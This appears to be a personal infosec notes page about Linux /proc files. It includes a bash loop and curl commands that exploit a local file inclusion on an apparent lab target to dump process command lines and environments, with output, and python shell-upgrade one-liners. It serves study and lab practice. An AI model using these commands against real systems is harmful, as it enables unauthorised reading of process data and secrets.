akde/infosec

Information security is ultimately about managing risk


For reverse engineering

Devi­ce­nameCon­tent
/proc/$pid/mapsShows the mem­pory map­ping of a process. Includes all used libraries.
/proc/self/loginuidOwn UID.

Read processes

If you can read /proc via a LFI:

#!/bin/bash

for i in {1..1024}
do
	echo $i
	curl http://10.10.11.154/index.php\?page=/proc/$i/cmdline --output /tmp/proc/$i
done

The, look in the /tmp/proc direc­to­ry for files > 0 byte.

Read envi­ron­ment of a process:

┌──(root💀imac2019-kali)-[~/p151.general.1/t117/enum]
└─# curl http://10.10.11.154/index.php\?page=/proc/425/environ --output /tmp/f                                                   23 ⨯
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   194    0   194    0     0   3500      0 --:--:-- --:--:-- --:--:--  3527

┌──(root💀imac2019-kali)-[~/p151.general.1/t117/enum]
└─# cat /tmp/f
LANG=C.UTF-8PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binHOME=/var/wwwLOGNAME=www-dataUSER=www-dataINVOCATION_ID=fe8f7fff3b4541928b90a35e1dc0ed5bJOURNAL_STREAM=8:10138

External ressources

Leave a Reply

About

Personal collection of some infosec stuff. Primary purpose of this site is to collect and organize for myself.

Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.

Checklists

Categories

Checklists: Ports

python -c 'import pty;pty.spawn("/bin/bash")';

python3 -c 'import pty;pty.spawn("/bin/bash")';